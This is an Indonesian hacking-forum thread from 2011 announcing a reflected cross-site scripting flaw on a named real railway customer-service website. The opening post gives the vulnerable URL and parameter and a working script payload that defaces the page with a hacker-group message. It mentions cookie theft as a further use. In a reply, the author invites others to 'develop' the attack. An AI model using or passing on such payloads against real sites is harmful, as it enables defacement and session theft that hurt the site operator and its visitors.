Page 1 of 1

XSS pada situs resmi KRL Care Center

Posted: Thu Nov 10, 2011 12:14 am
by Darkzzzz
Terdapat celah keamanan yang kritis berupa Cross Site Scripting yang bersifat Non-Persistent pada Website KRL Care Center. Walaupun tidak terlalu berbahaya, celah keamanan ini dapat menyebabkan XSS Defacing secara temporer ataupun hanya sekedar mencuri cookie saja. Sayangnya celah XSS ini hanya berjalan pada beberapa Web Browser saja, misalnya : Mozilla Firefox :mrgreen:

Poc

Code: Select all

Proof of Concept :
http://www.krl.co.id/infonew/undang.php?&start=0&p_f=0&t_cari=0&field_id=0&no=[b]Sisipkan Script Di Sini[/b]&kode_kondisi=0


Demo :

Code: Select all

www.krl.co.id/infonew/undang.php?&start=0&p_f=0&t_cari=0&field_id=0&no=<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : XCode, Hacker Cisadane, Depok Cyber, Muslim Hackers, Dunia Santai, Borneo Crew, Jiban Crew, etc<br/>Please patch your system";</script>&kode_kondisi=0
Hasil :
Image

Re: XSS pada situs resmi KRL Care Center

Posted: Thu Nov 24, 2011 8:17 pm
by ladade
wkwkwkmantap joinan ah
ciakakakakakak

Re: XSS pada situs resmi KRL Care Center

Posted: Fri Nov 25, 2011 8:37 pm
by Darkzzzz
ladade wrote:wkwkwkmantap joinan ah
ciakakakakakak
hahahah silahkan om dikembangkan